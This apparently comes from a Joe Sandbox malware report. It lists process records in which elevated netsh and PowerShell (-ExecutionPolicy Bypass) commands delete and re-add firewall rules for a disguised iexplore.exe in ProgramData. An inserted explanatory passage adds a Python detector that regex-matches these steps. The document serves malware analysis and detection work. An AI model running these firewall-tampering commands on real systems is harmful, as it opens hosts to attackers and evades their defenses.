                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=out program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:28
                                                                                                                  Start time:07:25:43
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

Target ID: 29
Start time: 07:25:43
Start date: 30/10/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Imagebase: 0x7ff613a80000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 07:25:51
Start date: 30/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 07:25:51
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 07:25:52
Start date: 30/10/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Imagebase: 0x7ff613a80000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 07:26:02
Start date: 30/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Outbound' dir=out action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 07:26:02
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 07:26:02
Start date: 30/10/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Outbound" dir=out action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Imagebase: 0x7ff613a80000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 07:26:13
Start date: 30/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat""
Imagebase: 0x7ff7ca4c0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 07:26:13
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 07:26:13
Start date: 30/10/2024
Path: C:\Windows\System32\PING.EXE
Wow64 process (32bit): false
Commandline: ping 127.0.0.1 -n 2
Imagebase: 0x7ff6816a0000
File size: 22'528 bytes
MD5 hash: 2F46799D79D22AC72C241EC0322B011D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true
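
The records above show the whole chain in order: an elevated netsh.exe deletes every outbound rule for the dropped iexplore.exe under C:\ProgramData (the real Internet Explorer lives under Program Files, not ProgramData), PowerShell launched with -ExecutionPolicy Bypass re-adds inbound and outbound allow rules through netsh for both the private and public profiles, and a batch file in Temp runs ping 127.0.0.1 -n 2 as a roughly one-second sleep. The Python script below is an added example and is not part of the Joe Sandbox report or of the sample: it runs a small detector over process-creation events built from these command lines. The command lines are copied from the records; the pid/ppid values and the benign control event are assumptions made for illustration.

```python
"""Flag the firewall-tampering and ping-sleep chain recorded in the process list above.

Added example, not part of the Joe Sandbox report. Input is a list of
process-creation events carrying the fields a Sysmon Event ID 1 record has
(ProcessId, ParentProcessId, Image, CommandLine). The command lines in
SAMPLE_EVENTS are copied from the report; pid/ppid values and the benign
control event (pid 40) are constructed for illustration.
"""
import re

# Directories a dropper can write to without special rights. An allow rule for
# a binary living here deserves far more scrutiny than one for Program Files.
USER_WRITABLE = re.compile(r"(?i)\\(ProgramData|Users\\[^\\]+\\AppData|Windows\\Temp)\\")
NETSH_RULE = re.compile(r"(?i)\badvfirewall\s+firewall\s+(add|delete)\s+rule\b")
PROGRAM_ARG = re.compile(r'(?i)program=["\']?([^"\']+)')
# PowerShell accepts unambiguous parameter prefixes, so -ep / -ex / -exec Bypass count too.
EXEC_BYPASS = re.compile(r"(?i)-e(?:xecutionpolicy|x\w*|p)\s+bypass\b")
PING_LOOPBACK = re.compile(r"(?<!\S)(?:127\.0\.0\.1|localhost|::1)(?!\S)")
PING_COUNT = re.compile(r"(?i)\s-n\s+(\d+)")
TEMP_BATCH = re.compile(r'(?i)\\Temp\\[^"\s]*\.(?:bat|cmd)\b')

SAMPLE_EVENTS = [  # constructed from the report's command lines; pid/ppid assumed
    {"pid": 29, "ppid": 2, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": r'"C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"'},
    {"pid": 30, "ppid": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"'''},
    {"pid": 32, "ppid": 30, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": r'"C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public'},
    {"pid": 36, "ppid": 2, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat""'},
    {"pid": 38, "ppid": 36, "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping 127.0.0.1 -n 2"},
    # Benign control (constructed): an admin allowing a binary under Program Files.
    {"pid": 40, "ppid": 5, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": r'netsh advfirewall firewall add rule name="VPN client" dir=in action=allow program="C:\Program Files\VPN\vpn.exe"'},
]


def program_path(cmdline):
    """Return the program= argument of a netsh firewall rule, or None."""
    m = PROGRAM_ARG.search(cmdline)
    if not m:
        return None
    # An unquoted path runs until the next key=value token, e.g. 'program=C:\x.exe enable=yes'.
    return re.split(r"\s+(?=\w+=)", m.group(1))[0].strip()


def analyze(event, by_pid):
    """Return a list of (finding, detail) tuples for one process-creation event."""
    cmd, image = event["cmdline"], event["image"].lower()
    findings = []

    rule = NETSH_RULE.search(cmd)
    if rule:
        path = program_path(cmd)
        if path and USER_WRITABLE.search(path):
            findings.append(("firewall_rule_for_user_writable_binary", f"{rule.group(1)} {path}"))

    if image.endswith("powershell.exe") and EXEC_BYPASS.search(cmd) and "netsh" in cmd.lower():
        findings.append(("powershell_bypass_wrapping_netsh", cmd))

    if image.endswith("ping.exe"):
        count = PING_COUNT.search(cmd)
        parent = by_pid.get(event["ppid"])
        batch = TEMP_BATCH.search(parent["cmdline"]) if parent else None
        if count and PING_LOOPBACK.search(cmd) and parent and parent["image"].lower().endswith("cmd.exe") and batch:
            # N loopback echoes spaced one second apart sleep roughly N-1 seconds.
            findings.append(("ping_as_sleep_from_temp_batch", f"~{int(count.group(1)) - 1}s via {batch.group(0)}"))
    return findings


def run_detection(events):
    """Map pid -> findings, omitting processes with nothing to report."""
    by_pid = {e["pid"]: e for e in events}
    results = {}
    for e in events:
        found = analyze(e, by_pid)
        if found:
            results[e["pid"]] = found
    return results


def rule_replacement(events):
    """Program paths whose rules were both deleted and added by netsh.exe in the
    same trace: the delete-then-re-add pattern the records above show."""
    actions = {}
    for e in events:
        m = NETSH_RULE.search(e["cmdline"])
        if m and not e["image"].lower().endswith("powershell.exe"):
            path = program_path(e["cmdline"])
            if path:
                actions.setdefault(path.lower(), set()).add(m.group(1).lower())
    return sorted(p for p, seen in actions.items() if {"add", "delete"} <= seen)


if __name__ == "__main__":
    for pid, findings in run_detection(SAMPLE_EVENTS).items():
        for name, detail in findings:
            print(f"pid {pid}: {name}: {detail}")
    print("rules replaced for:", rule_replacement(SAMPLE_EVENTS))
```

The checks key on the program= path rather than on the rule name, because the name ("Allow Internet Explorer Inbound") is free text the dropper picks to look legitimate, while the path under C:\ProgramData is the part it cannot disguise. The ping check requires the parent to be cmd.exe running a .bat or .cmd from Temp, so ordinary troubleshooting pings are not flagged, and the benign control rule for a binary under Program Files produces no finding.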

Memory Dump Source
• Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32d1006c935c963f7b36cc507f9199f2a48487705f88271c930a47f32fe07508
• Instruction ID: 089dcc7b1dfcd00dcc5bd96fb9c69eadac1dc1697a0afa4d597bf05b74221852
• Opcode Fuzzy Hash: 32d1006c935c963f7b36cc507f9199f2a48487705f88271c930a47f32fe07508
• Instruction Fuzzy Hash: 95D12631A0FA8D4FE7A5EBA848A55B57BA0FF16318B0901FFD45ECB4E3D918A905C341

Memory Dump Source
• Source File: 00000002.00000002.1911830483.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9baa0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3c6ab27bc35836a357965a73c125c631fc2bfb1c78060dac392988370ecc6bc
• Instruction ID: 8b88c156b2aa0eea3ada7d4679af1dd2d50e1c1cc420883f2b5cf5c91e5d2eef
• Opcode Fuzzy Hash: a3c6ab27bc35836a357965a73c125c631fc2bfb1c78060dac392988370ecc6bc
• Instruction Fuzzy Hash: B401E57591E7CC8FDB539B34883A0947FB0EE27200B1A01EBD488CB0B3D6595908C7A2

Memory Dump Source
• Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 873a093a0d3c6ef7fc1581dd8607a59a1ddf7c70a8bf21ae6cff73be4162655e
• Instruction ID: 289b7f7eb56921c21fda46d160f247cd35703dda53d27d19ac4e842e904d1b57
• Opcode Fuzzy Hash: 873a093a0d3c6ef7fc1581dd8607a59a1ddf7c70a8bf21ae6cff73be4162655e
• Instruction Fuzzy Hash: E4517B22B0EA8E0FE7A9EA5C44A25783BD2EF55325B1901BFC05DC79E3DE24EC018341

Memory Dump Source
• Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 56c630d15df842da7100ef384ab4ef1695198493dc24d2dd8a0c230ae5394d87
• Instruction ID: 3fd837a52698f789b4aab3a031f692469a2523ecab4ff094ca348053c938b88a
• Opcode Fuzzy Hash: 56c630d15df842da7100ef384ab4ef1695198493dc24d2dd8a0c230ae5394d87
• Instruction Fuzzy Hash: 93410422B0EA8D0FEBB9D66854B15B877D1EF45329B1A01BFD05EC75E3EA14AD018381

Memory Dump Source
• Source File: 00000002.00000002.1911110132.00007FFD9B98D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B98D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9b98d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eccb737b9034d1f5d028d67f94c55e6ccf6a9a3228f70e11a7046ac1618bba7a
• Instruction ID: 6a840055be3611ff0ee8f1ebfba34a8ba50ddee15ede15ed7a28ba6da16c412f
• Opcode Fuzzy Hash: eccb737b9034d1f5d028d67f94c55e6ccf6a9a3228f70e11a7046ac1618bba7a
• Instruction Fuzzy Hash: 6341277140EFC45FE7569B39D8659523FF0EF52320B1A06DFE088CB1A3D625A846C7A2

Memory Dump Source
• Source File: 00000002.00000002.1911830483.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9baa0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1ff3de8ceea9a809cd4e030fbca44bc41dd63496f34b3bf67ea8bf0262dc2d5e
• Instruction ID: dca6883f6d920657cc353236312d02830126cffe62f7eb9aac1fe0c4fd430087
• Opcode Fuzzy Hash: 1ff3de8ceea9a809cd4e030fbca44bc41dd63496f34b3bf67ea8bf0262dc2d5e
• Instruction Fuzzy Hash: FA31B63191CB4C8FDB18DB5C980A6E9BBE1FB98721F00422FE44993251CA71A8558BC2

Memory Dump Source
• Source File: 00000002.00000002.1911830483.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9baa0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b0199ed99591a99858e4db731851689d767d2769dcbd2567068ac1610aa6f83c
• Instruction ID: a4993fe76b9280c628ded002c502c3edf4eee6bb6d2f83e19c1581bf12f3a75e
• Opcode Fuzzy Hash: b0199ed99591a99858e4db731851689d767d2769dcbd2567068ac1610aa6f83c
• Instruction Fuzzy Hash: 1D21283090CA4C4FEB18DF9CD84A7E97BF0EB56321F04416BD048C3156CA74A446CBA1

Memory Dump Source
• Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b0e0205de208031f633c7f105620606fae7c9f8c614a9fb3bd29e96dbcc74d8a
• Instruction ID: 75360abefbcabb083e226fc21634770cb02a4838b3dc858e87357616e8807f62
• Opcode Fuzzy Hash: b0e0205de208031f633c7f105620606fae7c9f8c614a9fb3bd29e96dbcc74d8a
• Instruction Fuzzy Hash: F521E522B1E98A0FE7B5EA5844B21786AD1FF55229B5A01BED05DC7DF2CE24ED008341

Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d4f0d574e53814496a7a0c8d8e81f922a2198d69d1b3f1bf2d16b66e0980648
                                                                                                                    • Instruction ID: 0834d1d920cc6cd928ca1920b84dd047e8e8cbec2388e494ca86defeb49c5b81
                                                                                                                    • Opcode Fuzzy Hash: 3d4f0d574e53814496a7a0c8d8e81f922a2198d69d1b3f1bf2d16b66e0980648
                                                                                                                    • Instruction Fuzzy Hash: 6811C132A0F5890FE7B5D66884B057C66D1FF4532AB5B00FED05DC79E2D914AD008341
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1911830483.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                    • Instruction ID: fe27c77d210453ff9ac8e18656f571fdffb2d1ba2cecbf8df11bf048f1b1a8d7
                                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                    • Instruction Fuzzy Hash: 5B01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5DA36E882CB45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 381b93ccc14d2d0a3cad8d9a027d976298ec8ea2ff9b2bbcdb4c818680139d8e
                                                                                                                    • Instruction ID: af645a1bc29b62bae66f785c9cd0fbcb0f47f63a791198a85f925cee9a98bed2
                                                                                                                    • Opcode Fuzzy Hash: 381b93ccc14d2d0a3cad8d9a027d976298ec8ea2ff9b2bbcdb4c818680139d8e
                                                                                                                    • Instruction Fuzzy Hash: 3651E471E09A4D8FEB64EBA8C4606EDBBF0EF96710F05027AD019D71E6CE756841CB40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 74e12ff6cd443e5464f8266149c76665e9b95e7d7b52d69c788ea22be157ed90
                                                                                                                    • Instruction ID: c42aca84ba8d4a7e405e68d4a5f0c322c0ceedda9d915d3f62c4966e5b2b5738
                                                                                                                    • Opcode Fuzzy Hash: 74e12ff6cd443e5464f8266149c76665e9b95e7d7b52d69c788ea22be157ed90
                                                                                                                    • Instruction Fuzzy Hash: 34419C30908A4D8FDB68DF98C885BEDBBF1FB99310F10426AD009E7256DB74A985CF40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6f1827ce0670b973e8d708f0c82d94cf5eb42deedb7cb611df3e9e9a59f08018
                                                                                                                    • Instruction ID: cbb33cc53d0de8819540757de606f62795d42d4cd903579592beb56e07c04840
                                                                                                                    • Opcode Fuzzy Hash: 6f1827ce0670b973e8d708f0c82d94cf5eb42deedb7cb611df3e9e9a59f08018
                                                                                                                    • Instruction Fuzzy Hash: A2410D12F0F5D60BE726A7EC68715F86B50EFA2365B0903B7C49CCA1E7CC5A29418392
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a2fbd27e1b8b897d10c4dd87e2d9aa1becb25ba17bc7ea2037fbad0bf57d656
                                                                                                                    • Instruction ID: ef99afb27b523b28cfeaacd8b74875a67073868b511744cb4faa3f32bc2f7950
                                                                                                                    • Opcode Fuzzy Hash: 3a2fbd27e1b8b897d10c4dd87e2d9aa1becb25ba17bc7ea2037fbad0bf57d656
                                                                                                                    • Instruction Fuzzy Hash: 69412730E0964D8FDBA5EFA8C4A4AFDBBB1FF59300F10016AD059E7291CB75A941CB54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6c292c9fc7d337754c450c82ca89864dba74f23bceb87db3788408427a83b36f
                                                                                                                    • Instruction ID: fc7d83efb75776e2d44c3b5eed9bef88d4a87adecf8fed41da2a59133e7b6492
                                                                                                                    • Opcode Fuzzy Hash: 6c292c9fc7d337754c450c82ca89864dba74f23bceb87db3788408427a83b36f
                                                                                                                    • Instruction Fuzzy Hash: A321E431A4964D4FDB60DB68D8216EDBBB0FF99310F05017AD008E3292CE795941CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 71ede54b7d47635a6068802795dcd70d75f98f7cf55c93e4609cf8b804095577
                                                                                                                    • Instruction ID: 860be972dd0ea05a61ac33fb9052d8c4a5dceff3f1fd6d4f0f48d5998465dbb8
                                                                                                                    • Opcode Fuzzy Hash: 71ede54b7d47635a6068802795dcd70d75f98f7cf55c93e4609cf8b804095577
                                                                                                                    • Instruction Fuzzy Hash: 78110812A0F6C50FE325937D5C612A46E91EF96310F1902BBD1CCC72EBD89AAC418396
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6Od$6Od
                                                                                                                    • API String ID: 0-2552814580
                                                                                                                    • Opcode ID: 863136419b61ae1d247731b5c9b100b3ecf8aa944e951566380ab65c1e3fc735
                                                                                                                    • Instruction ID: 5a052b71afbf79330b687c20263457bfeb31464e3bbeda5c2fdf8e48c936a38a
                                                                                                                    • Opcode Fuzzy Hash: 863136419b61ae1d247731b5c9b100b3ecf8aa944e951566380ab65c1e3fc735
                                                                                                                    • Instruction Fuzzy Hash: 5A715030E0961D8FDB94EF68D8A4BECBBB1FF59304F550179D009E72A6CA75A981CB01
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6Od$6Od
                                                                                                                    • API String ID: 0-2552814580
                                                                                                                    • Opcode ID: 6dedb8f936fb0889d432e43681d98a045a7e0146833817094911afbde29e8865
                                                                                                                    • Instruction ID: ed629ce15a673713ee063430dec25e46f9dcdb283c0486c3913d02dd9a7decbc
                                                                                                                    • Opcode Fuzzy Hash: 6dedb8f936fb0889d432e43681d98a045a7e0146833817094911afbde29e8865
                                                                                                                    • Instruction Fuzzy Hash: E3713D30E0961D8FDB94EF68D8A4BECBBB1FF59304F550179D009E72A6CA75A981CB01
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6Od$6Od
                                                                                                                    • API String ID: 0-2552814580
                                                                                                                    • Opcode ID: cffcb5be07b7df019270830a219fa5e8095c45a9c754b901f273fec08febc8b4
                                                                                                                    • Instruction ID: 5dbb844cf22c0b5ee098d0bf6318b9295fa420dc2e20bbe2ebb037efa7f26f2c
                                                                                                                    • Opcode Fuzzy Hash: cffcb5be07b7df019270830a219fa5e8095c45a9c754b901f273fec08febc8b4
                                                                                                                    • Instruction Fuzzy Hash: 43813174A0994D8FDF95EF6CC8A5AACBBF1FF5A300F1501A5D04DDB2A6CA74A841CB01
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P;]
                                                                                                                    • API String ID: 0-3130340819
                                                                                                                    • Opcode ID: 8799f19a6a001c687037023aadb962491d7ee3dfd5bf6bd91842df23d0b4fa9f
                                                                                                                    • Instruction ID: a927b9b155897a976532ea43137ca90b95b89552a5b717e285b71f4f21e93ae1
                                                                                                                    • Opcode Fuzzy Hash: 8799f19a6a001c687037023aadb962491d7ee3dfd5bf6bd91842df23d0b4fa9f
                                                                                                                    • Instruction Fuzzy Hash: C6C10C61E0E6894FE765D7B88875AA8BFB0FF56324F0902FAD458CB1D3DD24A841C345
